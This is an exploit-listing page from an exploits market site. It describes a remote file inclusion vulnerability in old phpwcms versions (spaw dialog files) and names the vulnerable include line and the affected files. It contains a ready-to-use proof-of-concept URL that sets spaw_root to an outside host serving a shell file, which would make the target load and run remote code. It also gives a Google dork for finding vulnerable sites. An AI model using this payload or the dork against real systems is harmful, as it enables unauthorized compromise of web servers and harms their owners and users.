[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability

Author
Morgan
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-675
Category
web applications
Date add
09-08-2006
Platform
unsorted
===========================================================
phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability
===========================================================



PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities

Discovered by :

|\/| _ ._ _  _.._
|  |(_)| (_|(_|| |
          _|



Vuln In :
include $spaw_root.'class/lang.class.php';

Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php

Vendor Website: http://www.phpwcms.de/

PoC:
http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat?

Google Dork:

inurl:"phpwcms/index.php?id="




#  0day.today [2024-12-25]  #